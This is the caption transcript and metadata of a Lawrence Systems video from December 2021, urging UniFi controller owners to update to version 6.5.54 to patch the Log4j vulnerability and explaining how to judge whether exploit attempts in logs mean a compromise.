Patching UniFi Against The Log4J CVE-2021-44228 Vulnerability

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

tom here from lawrence systems and if you're not running at least unified controller version 6.5.54 you are vulnerable to cve 2021-4428 or the log 4j problem that's going around right now in december of 2021. quick explainer log4j is a logging facility for java applications if you don't want to write your own logging facility to standard output or use some special tool it does not have proper input standardization which allows for remote code execution just from parsing the log so this is a logging facility that is very popular very widely used by many many companies unify included who wrote their controller software specifically in java and then they chose this particular tool which unfortunately didn't input sanitize the code which means if you have ports publicly exposed such as you have the controller hosted well maybe at your office like we do and you have your different network devices outside of the network and you open ports so they can talk back in any logging that would have been done on that port that is then parsed inside the controller would then have a problem this also goes for if you expose the web interface which we don't but we do have a couple ports open i am not a hundred percent right now which ports get logging and which ones don't because the logging port specifically is not one we open for unifi but it's best to get updated because if any of these ports that are open actually pass through the log j4 process within the unifi controller there's a potential for that to be exploited so if you have this completely on a closed network with nothing on the network locally that could be attacking it you haven't opened it there's much less risk but i still recommend patching if you have this exposed because you're running it on a hosting environment i recommend you absolutely get dispatched if you're running this on hostify yes riley chase rolled out the patch immediately as soon as this came out ubiquity was very quick to do this and as soon as the problem was made aware to the greater security teams and everything out there and a patch was available they were quick and on top of it but of course people are not always quick and on top of it so i wanted to just tell people get it out there get it patched so you're not vulnerable now i will be leaving a link right here to the unifi application 654. if there's a newer version when you're watching this in the future get whatever the latest version is but this is just them talking about it and as i said they were very quick to be on top of this but i also want to mention the new security bulletin that came out today on december 13th is a little different but not anything different you have to worry about if you've already passed and loaded that version this is just more the official write-up on here and talking about just how bad it is because as we triage this as we get a better understanding of the severity of this vulnerability it was really bad as what we thought in the beginning and as it's proved three days later to prove to be really really bad all right next thing i want to mention is this right here someone asked me about log 4j attacks on unified cameras unifi protect which is the current camera system offered by unifi does not run on java therefore is not vulnerable so this appears to be a false positive and that is me commenting right here that's false positive this has also been posted over in ubiquiti forums i'll leave a link to this as well and same thing ubiquity's saying we don't run this on here this is ui marcus i believe he's one of the security people on there uh if i click that it might tell me but nonetheless it is uh really important to remember let's focus on what's important the unified protect system doesn't run on java therefore it's not really a concern in terms of this particular vulnerability but if you're running the old system there's very strong likelihood that it is vulnerable to that and it's end of life which is the old unified video that was end to life to a while ago if you're running that sorry there's no patch for it if you do some digging around you'll actually find some people discussing ways to patch it i've seen that in different forums but i don't know if any of them are good so i'm not going to post a link to them so i've not vetted it i don't have anybody running unified video now we updated our controller to 6.5.54 there's a couple of other things i wanted to talk about real quick and that is hopefully to answer the question of were you compromised now this is not something that affects the access points themselves it's all based on the controller because the access points or the switches do not run java but if you do have these controllers publicly exposed there is a risk well we use a tool called greylog i've talked about on my channel before and greylog is a full logging system by going through our logs we were able to see that there was actually no attempts with that particular string until december 13th and we patched and the day the unified controller came out which was on december 10th so we patched right away i can go through the logs there's actually no logs showing anyone trying to use that exploit for the last couple days and then all of a sudden this morning i seen a few of them start hitting now seeing this in your logs is not an indication of compromise it is an attempt but that attempt if it doesn't have anywhere to go doesn't go anywhere for example looking at my web server logs i did see right away on my forums for example quite a few attempts on there nothing on my forums runs anything java with log 4j in it therefore none of my forums were you know anything more than just annoyance to see it all in the logs on there so seeing the logs is not an indicator of compromise but seeing that compromise can be you know scary when you start seeing oh my gosh my logs are filled with that if you don't have any vulnerable applications they're just noise in the logs and they just return 404 pages for people sending them over to my web server because there's nothing there to see if you are really being a little bit more cautious and you think maybe you were compromised because you're watching this in the future and there's a lot of attacks out there you can take a backup of unify hopefully to my knowledge at this time there's no way to infect the backup itself you would download the backup reload the controller and restore the backup and that should be able to do it and just destroy whatever machine that was running on so hopefully these are enough steps to mitigate this i will do updated videos if there's something more we know in the future right now it's just everything's on fire and let's get this patched as fast as we can to avoid more things catching on fire in the future and we already know there will always be some people out there that have got these servers running and it's not broke don't fix it until uh something more severe comes along and leverages this to stack it with some other vulnerabilities to create something well really terrible either a whole lot of crypto miners running or maybe some type of new botnet attack that'll come out of this because there's so many things vulnerable to this not just unify but nonetheless please get patching on this so you're not part of the problem thanks and thank you for making it all the way to the end of this video if you've enjoyed the content please give us a thumbs up if you would like to see more content from this channel hit the subscribe button and the bell icon if you'd like to hire a sure project head over to lawrences.com and click the hires button right at the top to help this channel out in other ways there's a join button here for youtube and a patreon page where your support is greatly appreciated for deals discounts and offers check out our affiliate links in description of all of our videos including a link to our shirt store where we have a wide variety of shirts that we sell and designs come out well randomly so check back frequently and finally our forums forums.laurensystems.com is where you can have a more in-depth discussion about this video and other tech topics covered on this channel thanks again for watching and look forward to hearing from you you

Info

Channel: Lawrence Systems

Views: 5,500

Rating: undefined out of 5

Keywords: LawrenceSystems, unifi network upgrade, ubiquiti unifi, unifi 6.5.54, unifi controller, unifi controller setup, unifi controller update, unifi controller software, unifi log4j, unifi log for shell, unifi log4j mitigation, log4j mitigation, log4j2 mitigation, log4j migration steps

Id: _sC7ntv0PUY

Channel Id: undefined

Length: 7min 36sec (456 seconds)

Published: Mon Dec 13 2021